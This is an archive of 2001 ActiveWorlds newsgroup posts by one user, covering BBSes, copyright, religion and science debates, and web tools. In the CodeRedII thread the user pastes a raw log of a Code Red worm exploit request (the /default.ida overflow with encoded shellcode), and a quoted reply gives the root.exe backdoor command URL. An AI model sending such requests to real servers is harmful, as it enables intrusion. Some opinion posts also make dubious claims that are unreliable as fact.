john viper // User Search

1  ...  3  4  5  6  7  8  ...  11  |

Copyright question

Jul 30, 2001, 9:49pm
"faber" <Walter at Knupe.de> wrote in
news:3b618590 at server1.Activeworlds.com:

> Its little simpler even:
>
> a patent applies to a method, while a copyright applies to an
> implementation.
>
> Faber

Very well put!

Jeff Tickle (John Viper, #296714)
jviper at jtsoft.net
http://www.jtsoft.net

BBS...

Aug 5, 2001, 10:51pm
"anduin lothario" <anduin at anduin-lothario.com> wrote in
news:3b6db77b at server1.Activeworlds.com:

> Hi all,

Yo.

> I was wondering if anyone on ActiveWorlds actually has a BBS system which
> allows us to telnet to?

I would doubt it... Wings post confirms my assumption.

> If any of you actually KNOW what one is? lol

Not really. I have a general idea of how it works: a program monitors the
Telnet port of a system, and communicates via the telnet protocol. Rather
than using Telnet to browse files on a system, it is used for some kind of
message board or other. But that is all I know, can anyone help me with the
specifics?

> If you have one, please let me know :D

I guess I don't, but maybe I could write one?

jviper at jtsoft.net
http://www.jtsoft.net

BBS...

Aug 6, 2001, 1:03am
"anduin lothario" <anduin at anduin-lothario.com> wrote in
news:3b6defca at server1.Activeworlds.com:

> Thanks John :)
>

> Yes, that's basically what it is, although before it never used telnet,
> it use to be connection from modem to modem using your phoneline (like
> calling an ISP I guess).
>
> Most good BBS's have a message system and a files area, where you can
> upload and download files in specific areas, depending on your
> interests and your file ratio (if the Sysop "System Operator" has set
> ratios up). You can also find online door games like Legend of the Red
> Dragon, which is a classic.
>
> BBS's require you to log in using your name and password :)
>
> BBS's did die for a while, but now, after almost 5 years, SysOp's are
> starting to open up BBS's again, using telnet...
>
> Hope this helped a little...
>
> <snip again>

Actually that does sound kinda interesting :-) I was thinking about it, and
I do remember readme files going on and on about BBS'es in (really) old
games like the Monuments of Mars, FGodmom, *thinks* oh gosh there are too
many... the old ones were the best. Jeez, I gotta find Monuments of Mars!
Dont think I ever beat that one...

Oh and I remember everything had id.diz or something like that in the
distribution. Whatever... can you point me to any BBS servers that I can
try out?

-John

Jeff Tickle (John Viper, #296714)
jviper at jtsoft.net
http://www.jtsoft.net

BBS...

Aug 6, 2001, 8:13am
"tyrell" <tyrell1 at sk.sympatico.ca> wrote in
news:3B6E3CDF.E8762895 at sk.sympatico.ca:

> <snip nostalgic message>

Wow... I wish I was old enough to comprehend back then!

Jeff Tickle (John Viper, #296714)
jviper at jtsoft.net
http://www.jtsoft.net

[Fwd: Complete Analysis of CodeRedII]

Aug 7, 2001, 10:12pm
"andras" <andras at andras.net> wrote in news:3B702530.6606912B at andras.net:

> Everyone who is running IIS4 or higher on W2K or NT4 probably
> interested to read this article. 600,000 server infected so far :(
> Andras
><snippety snip snip>

:-) *pats Apache Jakarta Tomcat server* Who the hell would ever yse IIS
when they can hava Apache, which is better and, umm, freeer?!

Actually this is an interesting snippet from my server log. I dunno if
someone has been trying to attack me with CodeRed or what, but what I DO
know is that www.worm.com does NOT look very promising...

----- BEGIN SERVER SNIPPETT
2001-08-03 04:21:26 - Ctx( ): 404 R( + /default.ida + null) null
Parse error, missing : in ccept: */*
Full GET /default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
xmlHOST:www.worm.com Accept: */*
*
Uß)????§½òߦ???? ò+²òæòò+jG?j-M?Uß+???? òjú+¦j-m?mjß+????~' ò²òæòò+¦j-i?
UT?????
 ò+++jG?j-A ºj-I~?¦j-e òj-uªU9?Ual-¦+¦jG-¦>w{V-=ß+t·÷+±±t=µµò+
(±+n˜t(t8
+ò+t=(ß=+ns=ò-=ߦß(tßas_v=·+ò+t=(ß=+t·÷=µµ+ò+==¦¦(°=±+ns=ò-··˜(·+···÷ò-
tnß=+n·=
¦=(±+n·=ò¦·==sò-fnß+t·÷=µµò+··µ=¦(v±·=ò-¦++¦ªºò-¦+¦ß(tßasòµ·÷¦=ßò÷··µ=
÷¦=ßò÷·v
v=÷ßòµ=v±òt=÷pò÷°±+=f=òHost:
???????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
????????????????????????????????????????????????????????????????????????????
????
??????????????????????????????????????3+¦??+ï?ï at `3¦¦$?+ ad¦???1îj

----- END SERVER SNIPPETT

Jeff Tickle (John Viper, #296714)
jviper at jtsoft.net
http://www.jtsoft.net

[Fwd: Complete Analysis of CodeRedII]

Aug 8, 2001, 8:13am

> You won't believe but %95 of those infected machines running IIS
> probably without the knowledge of the machine's owner! They have no
> webpages at all - just the standard "Under construction" default from
> MS. Most likely those ppl installed W2K without disabling the IIS
> install (it is installed by default). Of course they don't care about
> any security advisory (MS patches, etc) so it is easy to infect them.
> Thanks to M$ to make "secure" OSs :((

Now that you mention it, I got a call from a friend of mine a few months
back saying that he just discovered he was running IIS, so I did lots of
searching and could find it nowhere on this comp... looks like I finally
have the real test of things ;-)

> This was the CodeRed 1 trying to infect you. The IP you received this
> request is an already infected machine.

EEW! get it off!!!!!! ;-) I wonder who it was...

Jeff Tickle (John Viper, #296714)
jviper at jtsoft.net
http://www.jtsoft.net

[Fwd: Complete Analysis of CodeRedII]

Aug 8, 2001, 10:10pm
"andras" <andras at andras.net> wrote in news:3B7120AF.1456227B at andras.net:

> Your log should contain the requestor's IP. The fellow who wanted to
> infect you has no clue about it! This worm spread without human
> intervention. Andras

Ah well the sucky part is that Tomcat seems to overwrite the log files when
it is restarted. Damn. Oh well...

Jeff Tickle (John Viper, #296714)
jviper at jtsoft.net
http://www.jtsoft.net

[Fwd: Complete Analysis of CodeRedII]

Aug 8, 2001, 10:12pm
"agent1" <Agent1 at my.activeworlds.com> wrote in
news:3b714216$1 at server1.Activeworlds.com:

> Don't know if any of you read slashdot, but apparently you can run
> http://$IP$//scripts/root.exe?some-commandline-command ... apparently
> root.exe is just cmd.exe.
> <snippety snip snip>

Good ol' M$. You might think they actually encouraged crackers...

Ah wait, no. They DO encourage the crackers to do their cracking, but once
the cracking is done, they can sell the fix for a couple of kajillions of
bucks.

Jeff Tickle (John Viper, #296714)
jviper at jtsoft.net
http://www.jtsoft.net

Whipped...

Aug 12, 2001, 9:57pm
Very cool. This is a grand opportunity to test out the message filters
in NS 6.1 :-)

-JV

[View Quote] > The following are an example of my topic:

> Wing, SW Comit, Captain Mad Mike, Chucks Party, and Ryan.
>
> E N Z O makes a (off-topic) post and you all bitch down like punk ass
> bitches.. get a clue.. E N Z O doesn't care about any of you.. he doesn't
> try to make AW better for anyone.. Roland (somewhat) tries.. but E N Z O's
> "perfect" staff don't know a needed feature from a pointless one.. just
> thought it was funny that you idiots punk out when "the big one" posts
> something..

Copyright Registration

Aug 13, 2001, 8:52am
There was a nice discussion somewhere around news.activeworlds.com not
to long ago about copyrights, and a friend of mine just pointed me at
this site:

http://www.nolo.com/encyclopedia/articles/tc/nn207.html

Its a good read, I gotta PDA-ize it so I can read it later today...

-JV
--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Suspensions

Aug 14, 2001, 8:18am
Hey this is pretty cool... Netscape wants not to filter anything
properly so... you know....

-JV

[View Quote] > <WEEE!! That was a big SNIParoo!>

--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

My Beliefs (I'm bored)

Aug 15, 2001, 12:26am
Yes, I am American, and Christian (but in a much different sense than
most people consider to be "christian" but thats a different story) but
this has nothing to do with your beliefs. I believe what I believe to
br the only truth. I accept it to be real and believe in it. However,
I respect others' beliefs as well, and will not contest them unless they
ask me to do so.

However, I can still attempt to spice up the discussion scientifically.
As a Christian, I believe that in the beginning God created the
heavens and the Earth, and the whole 7 days thing and all that.
However, I also take a great interest in science. Most people say that
science and religion can never mix, because if you trace time in the
Bible, Earth is only about 7000 years old, rather than 4,600,000,000
years old. From what data I have collected from scholars who study the
original languages of the Bible as opposed to the heavily distorted
english versions that we have today, as well as data that I have
collected from the scientific world, I have found that science and
religion actually fit hand-in-hand, almost perfectly. But I am veering
off topic here, and perhaps reserve this for another discussion.

First off, your environmental views:

> ...at least this
> use to be a better place to live in before technology ruined it all for us,
> including destroying nature,...

I will admit that the human race in general has affected the environment
of the Earth, but nowhere near as badly as most people assume. I do not
know if it is a government conspiracy or if environmentalists just want
attention, but there is not that bad of an environmental problem with
the Earth. By the time kids in America are in their 4th grade of
school, environmentalists have taught them that they will die within
their lifetime because human beings will just ruin the whole place.
This is pure bull shit. When Industry came around, lots of people found
that they could make money very quickly by exploiting natural resources.
However, this really does not happen anymore. There are codes that
have to be followed by every industry that causes pollution, and in most
parts of the world, the emissions of motor vehicles have to be tested
regularly. Technology has been developed that will control pollution
very well. It is actually safer to drink water that has been through a
nuclear power plant than to drink water that has been filtered with
conventional measures, mainly because water coming out of a nuclear
power plant is absolutely pure. The slightest bit of radiation or other
kinds of pollution, and the power plant WILL be shut down until the
problem can be repaired.

You know, I could really go on and on, but I feel that I am getting
boring here. The point I am trying to make is that technology has in
many ways helped us out. So many human and nonhuman life exists because
of it. Because of technology, we have dialisis machines, artificial
hearts, artificial lungs, prostetic devices, and thanks to President
Bush's funding, we will finally be able to explore REAL solutions to
problems with cancer, AIDS, Alzheimers, spinal cord damage, etc. We are
on the very edge of making fuel cells economical, to the point that your
car's intake is hydrogen, and its exhaust is PURE WATER. Fusion power
is coming about quickly, which, instead of producing depleted uranium
and toxic waste, will produce helium. (Imagine the profit balloon
companies will make! ;-))

> ...re-producing to the state that some countries
> can't even support its people anymore.

You want to talk about overpopulation? Every time an area of the planet
has become overpopulated (and it has been going on since the first
civilizations), we simply find somewhere else to put our excess
population. When these areas become overpopulated, we move on to other
areas. Once, the entire Eurasian continent, Africa, and Australia were
full to the brim. Then, one day, a man named Chris accidentally bumped
into America. Well, the Earth is filling up again, and wow, look at
Popular Science a few months back... scientists have already developed
an ion pulse drive! Powered with zenon ions, this thing could not lift
a person off the ground, but once in space, could move an entire space
ship filled with people to Mars in under a month. Hell, it was like a 6
month journey just to get from Europe to America! This is no different!
We are making better time than the early explorers, and we are going
to a whole different planet!! Once we either set up colonies on the
place or terraform it (a very feasible probability), we won't have to
worry about overpopulation for awhile.

Ok, need to hit the stop button there again. Moving right along...

> Earth itself seems more like hell
> because of it, some people don't want to live in it anymore, walking down
> the streets and getting their heads kicked in over a t-shirt. We, ruined it
> all for ourselves...

No, I did not cause things like this to happen, and I certainly hope
that neither did you. Unfortunately there are folks who are mean like
this, but they made themselves that way, and will certainly be worse off
for it. You mention later on where you believe heaven is and where hell
is... well hey *shrug* you already know you got it better than them.

<snip due to no comment>

> Now, this is the part that is most definitely going to get me some flames
> and some miss-treating...
> I believe in the bible being created to control man, man created it and
> spread it to control.
> And this part is even worse, but yes, I ripped up my bible to threads 10
> years ago...

No flames here. You are free to believe what you want to believe. If
ripping your bible to shreds made you happy, then so be it. Just keep
your destructive little hands off of mine ;-)

> I don't care what your beliefs are, you keep believing them, I will keep
> believing mine :)

Exactly!

> But I post this, because this is my true beliefs and I was also bored off my
> nut, and had to write something which may start a huge debate...

lol! Well good luck on the debate. Damn, I gotta do homework.

-JV
--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

My Beliefs (I'm bored)

Aug 17, 2001, 9:00am
Ooh, more fun! :-) Christian beliefs powered down, scientific mode
active...

Wow. That was a long one, but in my opinion, it has some big flaws in
it. You seem to think that medication and air conditioning and canned
beans (?!) are "artificial" and are disturbing our link with nature.
Well, you see, lets look at it from the point of view of fate.
According to fate, all creatures start out at an ice age and evolve and
split off into their own life forms. They all live happy lives and
then, another few million years comes around and all but a few hundred
just die. This time around, a form of creature evolved who knows how to
actually manipulate its environment and is trying to discover the
meaning of things.

Because this creature has the ability to heal itself from otherwise
deadly deseases, control the climate in which it lives, and store food
for long periods of time in case it is needed, you think we are now
changing the natural order of things. According to you, Mommy Nature
told us to be cave men and eat raw meat and just have a good time dying
from heatstroke, hypothermia, various natural deadly diseases, and
hunger, but somebody decided to grow a brain and think for himself, and
completely ruin nature.

Why?

I don't understand. You see, we were cave men before we evolved. We
did enjoy death and raw meat. But we evolved according to Nature. We
turned into intelligent creatures with minds powerful enough to
understand how to create fire. So we got in fights with each other
(animals do this too), so we developed weapons. Fire, weapons... it all
just had to continue getting better and better as we evolved. A few
thousand years later, this natural technology that we had developed
(flint and steel and an axe, respectively) evolved with us. You see,
human evolution is not just physical and mental, it includes
technological. It is natural that our technology develops with us.
UNLESS THERE WAS SOME OUTSIDE FORCE AFFECTING US, THEN ALL TECHNOLOGY IS
NATURAL. Now I cannot argue that perhaps aliens or something gave us
technology, but it just makes no sense to me. Even if they did, read
on, and we will discuss the next ice age..

Alrighty. Within the next decade or two, we will have most likely set
foot on mars, and a few more decades and we will settle there. We have
developed some incredible space flight techn9ology in the last 50 years.
Imagine what we can achieve in the next 500,000 years? An ice age
certainly will not occur before then, and I am sure we can find other
habitable planets. Or maybe our technology will be great enough that we
can terraform Mars or Venus.

You also seem to think for some reason that medical technology just
developed and stopped and someone said "OK, thats enough. Any more
diseases and you're on your own." NO! We are developing more and more
medicine every day. We are soon going to be able to replace organs and
spinal tissue. When newer diseases come around, or when current ones
evolve to the point where current vaccinations and medications cannot
control them, guess what: WE WILL DEVELOP MORE!!! Disease will NEVER
out grow our medical technologies!!

You mentioned near the end that members of the human race are always
killing each other. What did your mom tell you about now believing
everything you see on TV? Yes, we fight wars. Yes, our
less-controlable members of society feel the need to kill others. TELL
ME ANIMALS DO NOT DO IT. I DARE YOU. Besides, you exaggerate. I have
never killed anyone, and I hope you haven't. I would be willing to bet
that no one in this newsgroup has ever killed anyone. This isn't to say
that people don't say they want to kill someone, but it is not true.
They simply don't want to have to deal with the other person. It is the
natural way of things, and I hereby reserve the right to be pissed off
at someone!

Please post your thoughts. This is getting fun. :-)

-JV

[View Quote] > But by controling disease and dissorder, and by buying our air conditioner's and canned food we are slowing the evolution of our
> kind, if not bringing it to a hault. The rest of the world is moving in it's natural course which we do not understand and take
> blame for, but yet we still sit in our air conditioned house, eating our canned beans and taking our medication, all of which is
> leading to our own death. By stalling evolution in such a matter we are dangering ourselves with a great disaster. In 20, 30, 40,
> 100 years from now when the earth's thousand year cycle has reached it's heat point again (before reverting back to an "ice age"
> where it all begins again) we are still alive, the same as we were 20, 40, 100 years before... but just then.. we run out of canned
> beans, our electricity supply burned by the blazing heat of the sun and our diseas evolve beyond our medication. What do we do
> then? When if we had let nature take it's course we would have evolved with it and not set ourself up for crisis. I honestly
> believe we are over-developing our land and resources, and when we realize this it will be too late. If you believe in such a
> thing; what we are doing now is destroying the next generation of the "human race" and destroying the natural cycle of evolution and
> change. The earth's cycles begin with an "ice age" and evolve in to creatures able to meet the needs of the changing environment..
> the world slowly heats up untill all the ice has melted and it sits a giant puddle, after which the sun and earth resume their
> cycles, much larger then modern science is aware of and the world slowly dips into darkness and cold, at which it freezes, then the
> sun slowly comes closer to our planet once again as the orbit continues, the planet heating and the few remaining ice-creatures
> evolving.. into water based life forms which survive in the amazing amount of liquid coating the planet.. it is dried and evaportes
> into an "upper atmosphere" of "clouds" which co-exist far beyond our scape, awaiting to rain.. freeze where it is frozen and flow
> into rivers and oceans for our consumption and re-enterance into the "cycle" that we are presently aware of. When these sea
> creatures evolve into humans again, because of the amount of resources we consumed they will be set far back, and doubtfully survive
> long enough to evolve to the changing planet, thereby ending animal life on earth. Plant life will soon follow as the bodies of the
> dead can no longer fertilize the soil for them to grow, and control their population from simply destroying eachother. The earth
> becoming yet another desolate wasteland that people in other galaxies will come to "debate" if there was ever live on such a baren
> planet. This may sound outlandish.. but it makes perfect sense to me..

It sho does sound outlandish

--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

My Beliefs (I'm bored)

Aug 17, 2001, 9:02am
Well said :-) I will admit that we are not encouraging intelligence to
develop... I figure let them jump off if they want to, they'll learn!
ok, maybe that person will not learn, but certainly an onlooker will...

-JV

[View Quote] > Quite well said. However, the type of evolution stopping that is truly detrimental to our kind is the evolution of intelligence.
> We're idiot proofing everything dammit. THere are signs on cliffs saying not to jump off now. Grrrrr.

John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

My Beliefs (I'm bored)

Aug 17, 2001, 7:26pm
Well, considering that there is so much proof in science to say we have
been around for significantly longer than Christian beliefs says we
have, what I believe is that humans evolved from monkeys just like
everyone says, but maybe God helped out a bit.

"But that could not have happened in 7 days" I am not sure about this.
The Bible says 7 days, but there are so many things to say that it was
not 7 days. I figure one of 2 things. Either God did create everything
in 7 days and just for stability's sake made all the other scientific
evidence of all this stuff, or the 7 days story was put there so that
everyone could understand (try telling people 5000 years ago that the
universe was created when an atom exploded, and then fast forward onto
the Solar system's cloud of dust and all that... just dont work). I am
not certain on any of this, and do not want to say that I flat out
believe in what I am not certain of.

-JV

[View Quote] [View Quote]
--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Tater Tot Casserole

Aug 15, 2001, 11:57pm
Wow...

Mom just fixed something really original this evening. I don't know the
intricate details of the recipe but basically it has tater tots
(hashbrowns, whatever), hamburger, and mushroom soup. Bake it for a
little while and you get something really yummy! I suppose you could
put some green peas in it or something like that if you want it to
actually be healthy or something...

-JV

--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

blurry till close

Aug 17, 2001, 12:38am
<MrT>I pity the foo don't put no space between his message and his
quoted text!</MrT>

-JV

[View Quote] > but its kind of hard to read the text when it is so close to all the jibba
> jabba under it
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Domain Names?

Aug 18, 2001, 11:30am
www.networksoultions.com

its $35/year, they have the best DNS stuff available, you have FULL
control over your domain, and never any ads. Expensiveish, but I use
em, plus I think it is just tradition

-JV

[View Quote] > Anyone know a good domain name register that doesn't have a pop-up or frame

--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Maps of Alpha-world

Aug 20, 2001, 8:06am
I think you are probably talking about the aw mapper at
mapper.activeworlds.com

-JV

[View Quote] > I came across some maps of Alpha World the other day and I can't find

--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

In Depth Look (and demonstration)- New WindowsRG

Aug 22, 2001, 9:37pm
ROFLMAO!!!

Funnily enough, when I clicked "Crash", Netscape 6.1 did just that LOL!!
I am in pain I laughed so hard!! LOLOL!!! I'm suing you!!!
heheheheehheheheheheheheheeheee!!!!! ;-)

ok im done now

-JV

[View Quote] --
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Size of a Community

Aug 23, 2001, 9:03am
How big is too bog?

How small is too small?

I was just thinking about what a good community we have here in AW.
About 1000 people, right? 2000 people max who spends a few hours a week
building, chatting, and contributing in general to the general
community? Of course, not everyone checks the newsgroups every morning,
not everyone is an Alphabit Phalpha or a Goober King or the other
great community leaders we have, but everyone who comes in for a few
hours a week affects how things happen in their own little ways.

As it is right now, things feel comfortable. Most everyone gets along.
Of course, as is human nature, there are folks who don't like each
other very well, and there are folks who downright cause trouble. This
is natural: it happens. However, the community is never going to be
the same as it is right this instant, (and this phrase applies at any
time on any day), and I am wondering what its future is.

Will it grow?

Will it shrink?

What will be the long term effects of any growth or shrinkage that may
happen in the next few minutes or hours or days?

If it shrinks, will those left over become even closer and the community
work better than ever? Or will we get too close and all start to get
sick of each other?

If it grows, will those new additions simply add to the current
wonderful community? Or will we become too much like the community of
Earth in which you cannot just be friendly to everyone as it is right
now because we will have too many of the more negative elements? Or
could negative elements develop within us because of the growth?

Will public building worlds become underpopulated and shut down, or
become overpopulated and have everyone fighting for land? Or will they
just grow and shrink as needed?

Will things change as usual? Or will things stay the same for a change?

-JV

--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

We have received the answer to Arecibo

Aug 28, 2001, 8:11am
*shrug* I personally think that all the UFO sightings that aren't
actual abductions are just Government experiments: I think some folks
in the human race have developed some incredible technology, like hover
technology for cars or what have you, and just haven't released it to
the public yet.

Perhaps not a Government specifically, but maybe just a private group of
people who don't want anyone to know of their technology. Maybe they
fly over poor unsuspecting souls' houses just so that they can laugh at
them when they read the morning paper ;-)

Hey, who knows? Not meaning to pick on anyone here, but this is
actually what I believe. *shrug*

-JV

[View Quote] > I already shared it, read all my posts. I am not the only one that has seen this
> same exact thing, I have reported it to the National UFO Reporting site and also
> searched and found that this same kind of sphere has been seen over WA before
> and other states as well. We all can't be wrong. I only even became interested
> in finding a site where I could report it after I saw one. I didn't go looking
> for it, it was just here.

John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Another Question

Aug 28, 2001, 8:16am
Its a good idea. I have a pre-1990 version of C that was out far before
Windows. I used it because it was what I had up until just a few years
ago. I think that if it weren't for it that I would not perhaps be how
I am today. Wonderful experience, it was, and even Y2K friendly!

Of course, the OTHER way of programming in DOS, editing a file in a hex
editor and REALLY hacking... never was able to do that, but I can
imagine it must have been the most exhilirating experience........

*sigh* Back in those good ol' days........................

COMMODORE RULES! WE SHOULD ALL USE COMMODORES!!! C=!!!!!!

ok im done now

-JV

[View Quote] > Some programming computer courses require you to learn how to program in
> DOS. Windows is niether an operating system, nor a shell.
>
> SW Chris

John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Re: HRML editors (Was: Re: HTML posts)

Sep 11, 2001, 8:38pm
I used to use WYSIWYG editors very much... but lately I have had to go
back and modify the code a lot -- so much so that I have completely
stopped using Dreamweaver. To tell you the truth, after awhile, just as
Cypher said in The Matrix, you don't even see the code. Maybe I am just
crazy *shrug* but that is really how it is for me when it comes to HTML...

-JV

[View Quote] > Sorry folks, but nothing beats coding HTML by yourself. True, it may be
> "the hard way", but no HTML editor will ever be able to do *everything*
> for you. If you know the code, you can push HTML to the very limits,
> while still ensuring cross-browser compatibility.
>
> That's one reason I really loathe the FrontPage series. FrontPage is
> notorious for throwing in extra crap that's only understood by the IE
> browsers, leaving Netscape users in the lurch. If you're truly serious
> about making a good website that everyone can see, then Notepad's all
> you need. :)
>
> Real Men Use Notepad!

John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

NS6 Filtering

Sep 18, 2001, 8:09am
Does anyone know how to filter Newsgroup messages with NS6?

-JV

--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

NS6 Filtering

Sep 18, 2001, 7:47pm
GK,

That seems to only apply to my E-Mail account.

-JV

[View Quote] > In Netscape Mail, go to Edit -> Message Filters...

John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

NS6 Filtering

Sep 19, 2001, 8:52am
Going to Edit->Message Filters brings up the Message Filters box. There
is a dropdown list labelled "Filters For: " and my E-Mail account is the
only thing listed to select from. Also, adding filters to this has no
effect on the newsgroups, but does on the E-Mail account.

-JV

[View Quote] [View Quote]
--
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

thank you

Sep 19, 2001, 8:54am
I hate it when that happens. Tends to be embarrassing.

-JV

[View Quote] > a mis-sent email perhaps? =D

> On 18 Sep 2001 21:01:38 -0400, "internal affairs" <biginsey at yahoo.com>
John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

3.2

Sep 30, 2001, 11:37pm
I think they do change the format or at least encrypt jpgs and bmps for
copyright's sake and all that

-JV

[View Quote] > Yeah, I messed up there. Haven't a clue. AW uses a proprietary RAS format
> I think... I tried opening it up and Paintshop Pro and it didn't work. Why
> do you want to look at the textures anyways?
> --
> SW Chris
> Eagle Scout, Philosopher, Peacemaker, and... Kung Fu Master?
> http://www.winternet.com/~mikelr/flame1.html

John Viper (#296714)
jviper at jtsoft.net
http://www.jtsoft.net

"Life on Earth may be expensive, but it does include a free trip around
the sun..." -anonymous

Really Bad Evil Virus Warning!!!!

Oct 1, 2001, 8:48am
If you remember, the first of the 10-10's was 10-123, and then for some
reason they tacked on an extra 10 making it 10-10-123, and then all the
other 10-10's came around...

Funny virus ;-)

-JV

[View Quote] > LOL, I sure home so...